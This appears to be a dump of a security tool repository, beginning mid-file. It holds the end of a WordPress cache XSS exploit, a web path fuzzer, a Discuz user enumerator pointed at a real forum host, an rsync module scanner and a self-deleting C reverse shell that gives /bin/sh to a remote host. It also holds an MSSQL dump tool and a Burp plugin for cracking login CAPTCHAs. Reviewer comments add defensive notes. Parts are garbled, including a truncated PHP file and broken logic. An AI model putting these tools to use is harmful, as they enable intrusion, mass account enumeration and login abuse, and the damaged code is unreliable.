# plugin and can look in request logs for comment_author_url_* cookies whose
# values contain markup; the general fix is to HTML-escape cookie-derived
# data before it is rendered in an admin page.
27 | rand_str=hashlib.md5(str(time.time())).hexdigest()
28 | cookie="comment_author_url_"+rand_str+"="+poc+rand_str
29 | #print cookie
30 | get(url,cookie)
31 | else:
32 | print "Usage: wp-super-cache-xss-exploit.py uri \r\n "
33 |
--------------------------------------------------------------------------------
/fuzzing/cutescan.py:
--------------------------------------------------------------------------------
1 | #===============================================================================
2 | # Id :cutescan.y
3 | # Author:Yaseng
4 | #===============================================================================
5 | import sys, urllib2, time, os , Queue, msvcrt, threading,re
6 | from json import scanner
7 |
8 |
9 |
def cslogo():
    """Print the scanner's ASCII-art banner together with an example invocation."""
    banner = '''
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O ..
`+---------------------------^----------|
`\_,-------, ___@ PlayWeb ______|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________( For example:
`------' cutescan.py yaseng.me

'''
    print(banner)
25 |
26 | # show message
def msg(text, type=0):
    """Print ``text`` behind a status marker.

    ``type`` 0 selects ``[*]`` (information), 1 selects ``[+]`` (positive
    result) and every other value selects ``[-]``.
    """
    marker = "[*]" if type == 0 else ("[+]" if type == 1 else "[-]")
    print(marker + text)
35 |
36 | # readfile to array
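def file_to_arr(file):
    """Read a text file into a list of its lines.

    Args:
        file: Path of the file to read.

    Returns:
        One string per line, in file order, each stripped of leading and
        trailing whitespace; blank lines are kept as ``""``.
    """
    # The context manager closes the handle even when iteration raises; the
    # previous version never closed the file it opened.
    with open(file) as handle:
        return [line.strip() for line in handle]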
43 |
44 |
class ThreadGetKey(threading.Thread):
    """Thread that waits for a single console key press via ``msvcrt.getch``.

    Pressing ``q`` prints a notice and ends the whole process with exit
    status 1.  Any exception raised while waiting or printing ends the
    process the same way, without a message.  Any other key lets the thread
    finish normally.
    """

    def run(self):
        try:
            if msvcrt.getch() == 'q':
                print("stopped by your action ( q )")
                os._exit(1)
        except:
            os._exit(1)
54 |
# Orchestrates a scan of one host: loads three word lists from the data\
# directory (Windows path separators), adds words derived from the host name,
# records the size of a known-missing page as the "not found" baseline, looks
# for existing directories with scandir(), queues every
# directory x path x suffix combination and starts 30 Scaner worker threads.
# Results are only printed; nothing is returned.
# NOTE(review): all requests use plain "http://".  In server logs a run
# appears as a large number of requests for generated path names from one
# client within a short time.
55 | def cutescan(host):
56 | msg("Cutescan :" + host)
57 | path_list1 = file_to_arr("data\\path1.txt")
58 | path_list2 = file_to_arr("data\\path2.txt")
59 | suffix_list= file_to_arr("data\\suffix.txt")
60 | # Compile the dictionary
61 | path_list1+=compile_domain(host)
# Shared state for scandir() and the Scaner threads lives in module globals
# that are re-created on every call.
62 | global file_queue
63 | global path_list
64 | global url_list
65 | global g_error_page_size
66 | path_list = []
67 | url_list=[]
68 | file_queue = Queue.Queue()
69 | g_error_page_size=error_page_szie("http://"+host)
70 | for path2 in path_list2 :
71 | if len(path2) > 0:
72 | path_list.append(path2)
73 | for path1 in path_list1 :
74 | path_list.append(path1 + path2 );
75 | #print path_list
76 | scandir("http://" + host+"/")
77 | url_list.insert(0,"http://" + host+"/")
78 | for url in url_list:
79 | for path in path_list :
80 | for suffix in suffix_list :
81 | file_queue.put(url + path+"." + suffix)
82 | msg("Target:%s %d available path found %d url list compiled " % (host,len(url_list),file_queue.qsize()),1)
# The worker threads are started but not joined, so this function returns
# while they are still running.
83 | for i in range(30):
84 | Scaner().start()
85 |
# Requests curl + path + "/" for every entry of the global path_list and
# appends the URL to the global url_list when the response's Content-Length
# differs from the "not found" baseline.  A 403 response is also treated as an
# existing directory and is scanned recursively.
# NOTE(review): only urllib2.HTTPError is caught, so other failures (for
# example a timeout) propagate to the caller.  The baseline comparison relies
# on Content-Length alone; when the header is absent the default is the
# integer 0 while present values are strings.
86 | def scandir(curl):
87 | for path in path_list :
88 | url = curl + path + "/"
89 | #msg(url)
90 | try:
91 | r = urllib2.urlopen(url, timeout=10)
92 | size = dict(r.headers).get('content-length', 0)
93 | if g_error_page_size != size :
94 | msg("Path:" + url + " --->%d" % r.getcode(), 1);
95 | url_list.append(url)
96 | #scandir(url+"/") # Recursive fuzz path
97 | else :
98 | continue
99 | except urllib2.HTTPError as hr:
100 | # msg("Path:"+url+" --->%d" % hr.code,2);
101 | if(hr.code == 403) :
102 | url_list.append(url)
103 | scandir(url+"/")
104 | continue
105 |
106 | # compile domain to path_list exp : pentest.yaseng.com.cn => ['pentest.yaseng.com.cn', 'yaseng.com.cn', 'pentest', 'yaseng']
def compile_domain(domain):
    """Derive candidate words from a host name.

    The part of ``domain`` from the first recognised top-level suffix onwards
    is cut off and the remainder is split at dots.  The result is the full
    host name, then (when more than one label remains) the last label joined
    with the suffix, then the individual labels.  An empty list is returned
    when no suffix is recognised.
    """
    # NOTE(review): the leading "." of the pattern is an unescaped regex dot,
    # so it matches any character rather than only a literal period.
    suffix_re = re.compile('.(com|net|org|cc|gov|edu|cn|me|info|hk|tv|asia).*')
    suffix_match = suffix_re.search(domain)
    if suffix_match is None:
        return []
    labels = suffix_re.sub('', domain).split('.')
    words = [domain]
    if len(labels) > 1:
        words.append(labels[-1] + suffix_match.group())
    return words + labels
122 |
def error_page_szie(domain):
    """Return the ``Content-Length`` the server reports for a page that should not exist.

    The probe URL is ``domain`` + ``/cutescan9527.html``.  The value is the
    header string as received, or the integer ``0`` when the header is absent
    or the request fails for any reason (including an HTTP error status).
    """
    # NOTE(review): the fixed probe file name makes this request easy to
    # recognise in web server access logs.
    try:
        response = urllib2.urlopen(domain+"/cutescan9527.html", timeout=10)
    except :
        return 0
    headers = dict(response.headers)
    return headers.get('content-length', 0)
129 |
class Scaner(threading.Thread):
    """Worker thread that drains the shared ``file_queue`` of candidate URLs.

    Each URL is requested once; when the response's ``Content-Length`` differs
    from the global "not found" baseline ``g_error_page_size`` the URL is
    reported through ``msg``.  Any exception for a URL is swallowed and the
    worker moves on.  The thread ends when the queue is observed empty.
    """

    def __init__(self):
        threading.Thread.__init__(self)

    def run(self):
        while not file_queue.empty():
            candidate = str(file_queue.get())
            try:
                response = urllib2.urlopen(candidate, timeout=10)
                length = dict(response.headers).get('content-length', 0)
                if g_error_page_size == length:
                    continue
                msg("File %s found !!! Type:%s Size: %.4f m" % (candidate, response.headers['Content-Type'], float(length) / (1024 * 1024)) , 1);
            except :
                continue
150 |
151 |
# Script entry point: the first argument names a file with one host per line.
if __name__ == '__main__':
    cslogo()
    if len(sys.argv) > 1 :
        site_arr = file_to_arr(sys.argv[1])
        for site in site_arr :
            # A host is scanned only if a plain HTTP request to it succeeds;
            # any exception from the probe or from the scan itself is
            # reported as the host being unavailable.
            try :
                urllib2.urlopen("http://"+site, timeout=10)
                cutescan(site)
            except :
                msg(site+" look unavailable ")
                continue
164 |
165 |
166 |
167 |
168 |
169 |
170 |
--------------------------------------------------------------------------------
/fuzzing/dz.py:
--------------------------------------------------------------------------------
1 | #===============================================================================
2 | # Id :phpdisk.y
3 | # Author:Yaseng
4 | #===============================================================================
5 | import sys, urllib2, time, os , Queue, msvcrt, threading,re,base64,md5,hashlib,binascii,cookielib
6 |
7 |
8 |
9 |
def dzlogo():
    """Print the script's ASCII-art banner, name, author and usage line."""
    banner = '''
___ ___ ____ ____ ____ __ __ _ _
/ __)/ _ \( _ \( ___)( _ \( ) /__\ ( \/ )
( (__( (_) ))(_) ))__) )___/ )(__ /(__)\ \ /
\___)\___/(____/(____)(__) (____)(__)(__)(__)
Name:discuz account exploit
Author:Yaseng [yaseng@uauc.net]
Usage:dz.py site[www.yaseng.me] id[1]
'''
    print(banner)
20 | # show message
def msg(text, type=0):
    """Print ``text`` behind a status marker.

    ``type`` 0 selects ``[*]`` (information), 1 selects ``[+]`` (positive
    result) and every other value selects ``[-]``.
    """
    marker = "[*]" if type == 0 else ("[+]" if type == 1 else "[-]")
    print(marker + text)
29 |
class ThreadGetKey(threading.Thread):
    """Thread that waits for a single console key press via ``msvcrt.getch``.

    Pressing ``q`` prints a notice and ends the whole process with exit
    status 1.  Any exception raised while waiting or printing ends the
    process the same way, without a message.  Any other key lets the thread
    finish normally.
    """

    def run(self):
        try:
            if msvcrt.getch() == 'q':
                print("stopped by your action ( q )")
                os._exit(1)
        except:
            os._exit(1)
39 |
40 | # get url data
def get_data(url):
    """Fetch ``url`` with a 10 second timeout and return the response body.

    Every failure (network error, HTTP error status, malformed URL, ...) is
    swallowed by the bare ``except`` and reported as the integer ``0``, so
    callers must be prepared for either a string or ``0``.
    """
    try:
        return urllib2.urlopen(url, timeout=10).read()
    except :
        return 0
47 |
48 |
49 | # readfile to array
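def file_to_arr(file):
    """Read a text file into a list of its lines.

    Args:
        file: Path of the file to read.

    Returns:
        One string per line, in file order, each stripped of leading and
        trailing whitespace; blank lines are kept as ``""``.
    """
    # The context manager closes the handle even when iteration raises; the
    # previous version never closed the file it opened.
    with open(file) as handle:
        return [line.strip() for line in handle]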
56 |
# Looks up the display name for numeric user id `id` by fetching that user's
# public profile page from a hard-coded host and applying a regular
# expression to the HTML.  Returns the second regex match, or the sentinel
# string 'no--' on any failure (including get_data() returning 0).
# NOTE(review): this works only because profile pages are served to
# unauthenticated clients and user ids are sequential.  Requiring a login for
# profile pages and rate limiting per client are the usual countermeasures
# against this kind of account enumeration.
57 | def get_user(id):
58 | udata=get_data('http://home.rapidbbs.cn/home.php?uid=%d' % id)
59 | url_re = re.compile('home.php\?mod=space&uid=%d">(.*)' % id)
60 | try:
61 | rq=url_re.findall(udata) #match
62 | return rq[1]
63 | except :
64 | return 'no--'
65 |
# Worker thread: takes user ids from the global id_queue until it is observed
# empty, resolves each with get_user(), prints every hit and writes the name
# to the global file object fuserlist.
# NOTE(review): all workers write to the same file object without a lock, and
# the empty()/get() pair is not atomic, so a worker can block in get() when
# another thread takes the last item in between.
66 | class Scaner(threading.Thread):
67 | def __init__(self):
68 | threading.Thread.__init__(self)
69 | def run(self):
70 | while 1:
71 | if id_queue.empty() == True:
72 | break
73 | uid=id_queue.get()
74 | username=get_user(uid)
75 | if username !='no--' :
76 | msg("%d:%s" % (uid,username),1)
77 | fuserlist.write(username+"\n")
78 |
# Script entry point: prints the banner, queues the user ids 1 through
# 1181564, opens userlist.txt for appending and starts 100 Scaner threads.
# Command-line arguments are not read, despite the usage text in the banner.
# NOTE(review): on the server side this is about 1.18 million sequential
# profile requests from up to 100 concurrent connections -- a volume that
# per-client rate limiting and request-pattern alerting should catch early.
79 | if __name__ == '__main__':
80 | dzlogo()
81 | #print get_user(3)
82 | #exit()
83 | global id_queue
84 | id_queue = Queue.Queue()
# range() already yields integers, so the map(int, ...) wrapper changes nothing.
85 | for id in map(int,range(1,1181565)):
86 | id_queue.put(id)
# The output file is opened here and never closed explicitly.
87 | fuserlist = open("userlist.txt",'a')
88 | for i in range(100):
89 | Scaner().start()
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
--------------------------------------------------------------------------------
/fuzzing/php-enable_functions-enumeration-script.php:
--------------------------------------------------------------------------------
1 |
2 | $func enable",1);
15 |
16 | }
17 | }
18 |
19 |
20 | }else{
21 |
22 | msg("disable_functions none !!!",1);
23 |
24 | }
25 |
26 | function msg($text,$type=0){
27 |
28 | $def="[*]";
29 | $color="green";
30 | if($type ==1){
31 |
32 | $def="[+]" ;
33 | $color="red";
34 | }else if ($type==-1){
35 |
36 | $def="[-]";
37 | }
38 | echo "$def $text
";
39 |
40 | }
41 |
42 |
43 |
44 |
45 |
46 | ?>
--------------------------------------------------------------------------------
/fuzzing/rsync.py:
--------------------------------------------------------------------------------
1 |
2 | from common import *
3 | import sys, socket, time, os, subprocess, Queue
4 | from subprocess import *
5 | from lib.ThreadGetKey import *
6 |
7 |
# Result codes used by ping(): NORMAL is compared with the return value of
# connect_ex(), ERROR is printed and returned when the probe raises.
8 | NORMAL = 0
9 | ERROR = 1
# Not referenced in the part of the file shown here.
10 | TIMEOUT = 5
11 |
class ThreadGetKey(threading.Thread):
    """Thread that waits for a single console key press via ``msvcrt.getch``.

    Pressing ``q`` prints a notice and ends the whole process with exit
    status 1.  Any exception raised while waiting or printing ends the
    process the same way, without a message.  Any other key lets the thread
    finish normally.
    """

    def run(self):
        try:
            if msvcrt.getch() == 'q':
                print("stopped by your action ( q )")
                os._exit(1)
        except:
            os._exit(1)
21 |
22 |
def ping(ip , port , timeout=10):
    """Report whether ``ip``:``port`` accepts TCP connections -- currently always ``1``.

    The unconditional ``return 1`` on the first line means the connect probe
    below it never runs: no socket is opened and every host is reported as
    reachable.  The probe code is kept as it was written.
    """
    return 1
    try:
        probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        probe.settimeout(float(timeout))
        endpoint = (str(ip), int(port))
        if probe.connect_ex(endpoint) == NORMAL :
            return 1
    except Exception as e:
        print(ERROR)
        print("error:%s" % e)
        return ERROR
    probe.close()
    return 0
38 |
39 |
# Loads one host per line from `file` into the global queue host_list, starts
# the key-press watcher as a daemon thread and 20 RsyncCarck workers, and
# waits for the workers.  Prints "No Hosts" when the file yields no entries.
# NOTE(review): the file handle opened in the for statement is never closed
# explicitly, and every worker is constructed with the placeholder host "xx".
40 | def rsync(file):
41 | global host_list
42 | host_list = Queue.Queue()
43 | for host in open(file, 'r'):
44 | host_list.put(host.strip())
45 | l = host_list.qsize()
46 | threads = []
47 | if l > 0 :
48 | msg("Pentest %d hosts" % l)
49 | hander = ThreadGetKey()
50 | hander.setDaemon(True)
51 | hander.start()
52 | for i in range(20):
53 | a = RsyncCarck("xx")
54 | a.start()
55 | threads.append(a)
56 | for j in threads:
57 | j.join()
58 | else :
59 | msg("No Hosts")
60 |
61 |
class RsyncCarck(threading.Thread):
    """Worker thread: take hosts from ``host_list`` and list their rsync modules.

    For administrators reading this: an rsync daemon module is only reported
    here when it answers an unauthenticated client, so modules protected with
    ``auth users`` / ``secrets file`` and restricted by ``hosts allow`` in
    rsyncd.conf are the relevant hardening.
    """

    def __init__(self, host):
        threading.Thread.__init__(self)
        # Stored but never read by run(), which takes its hosts from the queue.
        self.host = host

    def run(self):
        while 1:
            # NOTE(review): empty() followed by get() is not atomic; with several
            # workers, get() can block forever once another thread took the last item.
            if host_list.empty() == True:
                break
                os.exit()  # unreachable (after break)
            time.sleep(1)
            host = str(host_list.get())
            msg("Pentest "+host+" rsync")
            if ping(host, 873):
                msg("Rsync server running", 1)
                rsync_client = "bin\\rsync.exe "; # rsync client path
                # NOTE(review): the command line is built by string concatenation
                # from a line of the host file and handed to os.popen(), i.e. to a
                # shell. Shell metacharacters in that file would be interpreted on
                # the operator's own machine; an argument list passed to
                # subprocess avoids the shell.
                pipe = os.popen(rsync_client + host + "::")
                msg_text = pipe.read()
                pipe.close()
                msg_arr=[]
                if msg_text :
                    msg_arr = msg_text.split('\n')
                if len(msg_arr) > 0:
                    # The count includes empty strings produced by split('\n').
                    msg("%d modules Found" % len(msg_arr), 1)
                    for module in msg_arr :
                        if module :
                            msg("Test %s::%s" % (host,module));
                            module = module.strip()
                            p = Popen(rsync_client + host + "::" + module, stdin=PIPE, stdout=PIPE)
                            req = p.stdout.readline()
                            # NOTE(review): `req and "@ERROR"` evaluates to the literal
                            # "@ERROR" whenever req is non-empty, so this condition is
                            # true for any line read and never inspects its content;
                            # the "Anonymous" message below is therefore not evidence
                            # that access was granted.
                            if req and len(req and "@ERROR") :
                                msg("Anonymous rsync module:" + module + " found !!!", 1)
                            else :
                                print req
                        else :
                            continue
                else :
                    msg("No modules Found", 2)
100 |
101 |
102 |
103 |
104 |
105 |
106 |
--------------------------------------------------------------------------------
/misc/Reverse Shell.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
/*
 * Connect-back shell: connects to argv[1]:argv[2] over TCP and runs /bin/sh
 * with the socket as stdin, stdout and stderr.
 *
 * Behaviour that matters to a defender reading this sample:
 *   - daemon(1,0) detaches the process from its terminal;
 *   - the address and port are zeroed in argv after parsing, so the process
 *     arguments no longer show them;
 *   - after a successful connect the program runs "rm -f" on argv[0], i.e.
 *     on its own file name, and keeps running;
 *   - descriptors 0, 1 and 2 of the shell all refer to one TCP socket.
 * A shell whose standard descriptors are a network socket, and a running
 * process whose executable has been removed, are the host-side signals.
 *
 * NOTE(review): argc is never checked, rms[21] has room for only 14 more
 * bytes before the unbounded strcat(), and argv[0] reaches system() unquoted.
 */
int main(int argc, char *argv[])
{
    int fd;
    struct sockaddr_in sin;
    char rms[21]="rm -f ";
    daemon(1,0);
    sin.sin_family = AF_INET;
    sin.sin_port = htons(atoi(argv[2]));
    sin.sin_addr.s_addr = inet_addr(argv[1]);
    /* Overwrites both argument strings with zero bytes. */
    bzero(argv[1],strlen(argv[1])+1+strlen(argv[2]));
    fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) ;
    if ((connect(fd, (struct sockaddr *) &sin, sizeof(struct sockaddr)))<0) {
        perror("[-] connect()");
        exit(0);
    }
    /* Builds and runs "rm -f <argv[0]>" through the shell. */
    strcat(rms, argv[0]);
    system(rms);
    /* Point stdin, stdout and stderr at the socket. */
    dup2(fd, 0);
    dup2(fd, 1);
    dup2(fd, 2);
    /* The new process image is /bin/sh; its argv[0] is the string "sh -i". */
    execl("/bin/sh","sh -i", NULL);
    /* Only reached when execl() fails. */
    close(fd);
}
--------------------------------------------------------------------------------
/misc/YMssql.cpp:
--------------------------------------------------------------------------------
1 | #include "stdafx.h"
2 | #include
3 | #include
4 | #include
5 | #include
6 | #include
7 | #include
8 | #include
9 |
10 |
11 |
12 | #import "c:\Program Files\Common Files\System\ado\msado15.dll" no_namespace rename("EOF","EndOfFile")
13 |
14 |
15 |
/*
 * Run the SQL text in argv[1] through ADO against the server named in the
 * hard-coded connection string and append the first argv[3] columns of every
 * row, as one quoted comma-separated line, to the file named in argv[2].
 *
 * NOTE(review): argc is never checked, so fewer than three arguments means
 * argv[1..3] are read past the argument list. The connection string embeds
 * a user name and password in the binary; real credentials should not be
 * compiled in.
 */
int main(int argc, char* argv[])
{
    printf("[*]Mssql exploit \n");

    char* strSql=argv[1]; //"SELECT * from test.dbo.users";
    char* strFile=argv[2]; //"d.txt";
    int nSize=atoi(argv[3]); //3;

    // Output is opened in append mode; whether the open succeeded is not checked.
    std::ofstream log;
    log.open(strFile,std::ios_base::app);

    ::CoInitialize(NULL);

    _RecordsetPtr m_pRecordset("ADODB.Recordset");
    _ConnectionPtr m_pConnection("ADODB.Connection");

    _bstr_t bstrSQL(strSql);

    try
    {

        m_pConnection.CreateInstance("ADODB.Connection");
        _bstr_t strConnect = "Provider=SQLOLEDB; Server=127.0.0.1;Database=sa; uid=user; pwd=pass;";
        m_pConnection->Open(strConnect, "", "", adModeUnknown);

        printf("[+]Connect server succeed!!! \n");
        // NOTE(review): this NULL test comes after m_pConnection was already
        // dereferenced by Open(), and it only prints -- execution continues.
        if (m_pConnection == NULL)
        {
            printf("Lind data ERROR!\n");
        }
        m_pRecordset.CreateInstance(__uuidof(Recordset));
        m_pRecordset->Open(bstrSQL, m_pConnection.GetInterfacePtr(), adOpenDynamic, adLockOptimistic, adCmdText);

        // PactNumber, OrigCount, username and strData are declared but never used.
        _variant_t PactNumber, OrigCount,username;
        while (!m_pRecordset->EndOfFile)
        {
            _variant_t varTmp;
            char strData[2048]={0};
            _bstr_t bstrData = "";
            // Columns are read by position 0 .. nSize-1.
            for (long j = 0; j < nSize; j++)
            {

                varTmp = m_pRecordset ->GetCollect(_variant_t(j));
                if (j > 0){
                    bstrData += ",";
                }
                // Values are wrapped in double quotes; a quote inside a value is
                // written unchanged, so such rows are not valid CSV.
                bstrData+="\""+ _bstr_t(varTmp)+"\"";

            }
            log <<(char*)(_bstr_t)bstrData<<"\n";
            //printf("%s \n",(char*)(_bstr_t)bstrData);
            m_pRecordset->MoveNext();

        }
        m_pRecordset->Close();
        log.close();

    }
    catch (_com_error e)
    {

        printf("Error message: %s",(char*)e.Description());
    }

    // NOTE(review): reached after an exception as well; if the connection object
    // was never created, this dereference is made on an empty pointer.
    if (m_pConnection->State)
    {
        m_pConnection->Close();
    }

    ::CoUninitialize();

    return 0;

}
109 |
--------------------------------------------------------------------------------
/misc/burp_captcha_crack.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | from burp import IBurpExtender
3 | from burp import IIntruderPayloadGeneratorFactory
4 | from burp import IIntruderPayloadProcessor
5 | from burp import IIntruderPayloadGenerator
6 | from java.io import PrintWriter
7 | import random
8 | import os
9 | import uuid
10 | import os,sys
11 | import base64
12 | import hashlib
13 | import time
14 | import urllib
15 | import urllib2
16 | import json
17 | import requests
18 | import string
# NOTE(review): reload(sys) + setdefaultencoding is a Python 2-only idiom that
# changes the implicit str/unicode conversion for the whole process.
reload(sys)
sys.setdefaultencoding('utf8')


# "pd" account id and key for the recognition service; obtain them from the
# service's user-centre page.
# NOTE(review): these four values are credentials -- keep real ones out of the
# source tree.
pd_id = ""
pd_key = ""
app_id = ""
app_key = ""
# Recognition type: see the pricing page on the official website to pick one;
# ask customer service if unsure which type applies.
pred_type = "30400"


# hard-coded payloads
# [in reality, you would use an extension for something cleverer than this]


# Request headers sent when fetching the CAPTCHA image.
# NOTE(review): a session cookie and the target host are embedded in the source
# here; anyone with read access to the file sees them.
headers = '''
Host: ya1.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: image/webp,*/*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://ya1.com/cms/fastadmin/public/lf2EomShPI.php/index/login
Cookie: PHPSESSID=vltk4df5fbn97vsf8mfjnobr71
'''

# URL the CAPTCHA image is requested from.
captcha_url = "http://ya1.com/cms/fastadmin/public/index.php?s=/captcha"


# Turn the header text into a dict: one "Name: value" pair per line, split at
# the first colon only.
headers = dict([[field.strip() for field in pair.split(':', 1)] for pair in headers.strip().split('\n')])

# Base URL of the recognition service. It is empty here and FateadmApi copies
# it as its default host, so SetHost() has to be called before any request.
FATEA_PRED_URL = ""
55 |
56 |
57 |
def LOG(log):
    """Logging hook; currently a no-op that discards *log*."""
    # Output is switched off. Restore the print below while testing.
    # print(log)
    return None
62 |
class TmpObj():
    """Small mutable holder; ``value`` carries a recognition result once set."""

    def __init__(self):
        self.init, self.value = True, None
67 |
class Rsp():
    """Parsed reply from the recognition service.

    ``ret_code`` stays -1 until a reply has been parsed. ``request_id`` does
    not exist as an attribute before ParseJsonRsp() has read a reply.
    """

    def __init__(self):
        self.ret_code = -1
        self.cust_val = 0.0
        self.err_msg = "succ"
        self.pred_rsp = TmpObj()

    def ParseJsonRsp(self, rsp_data):
        """Fill this object from the JSON text *rsp_data* (None means no reply)."""
        if rsp_data is None:
            self.err_msg = "http request failed, get rsp Nil data"
            return
        reply = json.loads(rsp_data)
        # RetCode arrives as a decimal string.
        self.ret_code = int(reply["RetCode"], 10)
        self.err_msg = reply["ErrMsg"]
        self.request_id = reply["RequestId"]
        if self.ret_code != 0:
            return
        payload = reply["RspData"]
        if payload is None or payload == "":
            return
        # RspData is itself JSON text and is decoded a second time.
        extra = json.loads(payload)
        if extra.has_key("cust_val"):
            self.cust_val = float(extra["cust_val"])
        if extra.has_key("result"):
            self.pred_rsp.value = extra["result"]
93 |
94 | def CalcSign(pd_id, passwd, timestamp):
95 | md5 = hashlib.md5()
96 | md5.update(timestamp + passwd)
97 | csign = md5.hexdigest()
98 |
99 | md5 = hashlib.md5()
100 | md5.update(pd_id + timestamp + csign)
101 | csign = md5.hexdigest()
102 | return csign
103 |
104 | def CalcCardSign(cardid, cardkey, timestamp, passwd):
105 | md5 = hashlib.md5()
106 | md5.update(passwd + timestamp + cardid + cardkey)
107 | return md5.hexdigest()
108 |
def HttpRequest(url, body_data):
    """POST *body_data* form-encoded to *url* and return the reply as an Rsp.

    No timeout is passed to urlopen(), and HTTP or JSON errors propagate to
    the caller.
    """
    request = urllib2.Request(url, urllib.urlencode(body_data))
    request.add_header("User-Agent", "Mozilla/5.0")
    raw_reply = urllib2.urlopen(request).read()
    result = Rsp()
    result.ParseJsonRsp(raw_reply)
    return result
117 |
def PostFile(url, data, img_data):
    """Upload *img_data* as the multipart field ``img_data`` and return the parsed Rsp.

    *data* is sent as the ordinary form fields of the same request.
    """
    upload = {'img_data': ('img_data', img_data)}
    # Local name chosen so the module-level ``headers`` dict is not shadowed.
    agent_header = {"User-Agent": "Mozilla/5.0"}
    reply = requests.post(url, data=data, files=upload, headers=agent_header)
    result = Rsp()
    result.ParseJsonRsp(reply.text)
    return result
125 |
class FateadmApi():
    # API client class for the recognition service.
    # Parameters: (appID, appKey, pdID, pdKey)
    def __init__(self, app_id, app_key, pd_id, pd_key):
        self.app_id = app_id
        if app_id is None:
            self.app_id = ""
        self.app_key = app_key
        self.pd_id = pd_id
        self.pd_key = pd_key
        # Default base URL; every request below is sent to self.host + a path.
        self.host = FATEA_PRED_URL

    def SetHost(self, url):
        self.host = url
    #
    # Query the account balance
    # Parameters: none
    # Returns:
    #   rsp.ret_code: 0 on success
    #   rsp.cust_val: the user's balance
    #   rsp.err_msg:  error details on failure
    #
    def QueryBalc(self):
        tm = str( int(time.time()))
        sign = CalcSign( self.pd_id, self.pd_key, tm)
        param = {
            "user_id": self.pd_id,
            "timestamp": tm,
            "sign": sign
        }
        url = self.host + "/api/custval"
        rsp = HttpRequest(url, param)
        if rsp.ret_code == 0:
            LOG("query succ ret: {} cust_val: {} rsp: {} pred: {}".format( rsp.ret_code, rsp.cust_val, rsp.err_msg, rsp.pred_rsp.value))
        else:
            LOG("query failed ret: {} err: {}".format( rsp.ret_code, rsp.err_msg.encode('utf-8')))
        return rsp

    #
    # Query the network latency
    # Parameters: pred_type: recognition type
    # Returns:
    #   rsp.ret_code:   0 on success
    #   rsp.request_id: unique order number
    #   rsp.err_msg:    error details on failure
    #
    def QueryTTS(self, pred_type):
        tm = str( int(time.time()))
        sign = CalcSign( self.pd_id, self.pd_key, tm)
        param = {
            "user_id": self.pd_id,
            "timestamp": tm,
            "sign": sign,
            "predict_type": pred_type,
        }
        if self.app_id != "":
            # An application id is configured: add it and its own signature.
            asign = CalcSign(self.app_id, self.app_key, tm)
            param["appid"] = self.app_id
            param["asign"] = asign
        url = self.host + "/api/qcrtt"
        rsp = HttpRequest(url, param)
        if rsp.ret_code == 0:
            LOG("query rtt succ ret: {} request_id: {} err: {}".format( rsp.ret_code, rsp.request_id, rsp.err_msg))
        else:
            LOG("predict failed ret: {} err: {}".format( rsp.ret_code, rsp.err_msg.encode('utf-8')))
        return rsp

    #
    # Recognise a CAPTCHA
    # Parameters: pred_type: recognition type   img_data: the image data
    # Returns:
    #   rsp.ret_code:       0 on success
    #   rsp.request_id:     unique order number
    #   rsp.pred_rsp.value: recognition result
    #   rsp.err_msg:        error details on failure
    #
    def Predict(self, pred_type, img_data):
        tm = str( int(time.time()))
        sign = CalcSign( self.pd_id, self.pd_key, tm)
        param = {
            "user_id": self.pd_id,
            "timestamp": tm,
            "sign": sign,
            "predict_type": pred_type,
            "up_type": "mt"
        }
        if self.app_id != "":
            # An application id is configured: add it and its own signature.
            asign = CalcSign(self.app_id, self.app_key, tm)
            param["appid"] = self.app_id
            param["asign"] = asign
        url = self.host + "/api/capreg"
        files = img_data
        rsp = PostFile(url,param,files)
        if rsp.ret_code == 0:
            LOG("predict succ ret: {} request_id: {} pred: {} err: {}".format( rsp.ret_code, rsp.request_id, rsp.pred_rsp.value, rsp.err_msg))
        else:
            LOG("predict failed ret: {} err: {}".format( rsp.ret_code, rsp.err_msg.encode('utf-8')))
            if rsp.ret_code == 4003:
                #lack of money
                LOG("cust_val <= 0 lack of money, please charge immediately")
        return rsp

    #
    # Recognise a CAPTCHA read from a file
    # Parameters: pred_type: recognition type   file_name: file name
    # Returns:
    #   rsp.ret_code:       0 on success
    #   rsp.request_id:     unique order number
    #   rsp.pred_rsp.value: recognition result
    #   rsp.err_msg:        error details on failure
    #
    def PredictFromFile( self, pred_type, file_name):
        with open(file_name, "rb") as f:
            data = f.read()
        return self.Predict(pred_type,data)


    #
    # Recognition failed: request a refund
    # Parameters: request_id: the order number to refund
    # Returns:
    #   rsp.ret_code: 0 on success
    #   rsp.err_msg:  error details on failure
    #
    # Note:
    #   Predict only charges when ret_code == 0, so a refund request is only
    #   needed in that case; otherwise no refund is required.
    # Note 2:
    #   Refunds are only for results that were returned normally but did not
    #   pass the web site's verification. Do not use this illegitimately or
    #   abuse it, or the account may be banned.
    #
    def Justice(self, request_id):
        if request_id == "":
            # Nothing to refund: returns None, not an Rsp.
            return
        tm = str( int(time.time()))
        sign = CalcSign( self.pd_id, self.pd_key, tm)
        param = {
            "user_id": self.pd_id,
            "timestamp":tm,
            "sign":sign,
            "request_id":request_id
        }
        url = self.host + "/api/capjust"
        rsp = HttpRequest(url, param)
        if rsp.ret_code == 0:
            LOG("justice succ ret: {} request_id: {} pred: {} err: {}".format( rsp.ret_code, rsp.request_id, rsp.pred_rsp.value, rsp.err_msg))
        else:
            LOG("justice failed ret: {} err: {}".format( rsp.ret_code, rsp.err_msg.encode('utf-8')))
        return rsp

    #
    # Top-up interface
    # Parameters: cardid: top-up card number   cardkey: top-up card signature string
    # Returns:
    #   rsp.ret_code: 0 on success
    #   rsp.err_msg:  error details on failure
    #
    def Charge(self, cardid, cardkey):
        tm = str( int(time.time()))
        sign = CalcSign( self.pd_id, self.pd_key, tm)
        csign = CalcCardSign(cardid, cardkey, tm, self.pd_key)
        param = {
            "user_id": self.pd_id,
            "timestamp":tm,
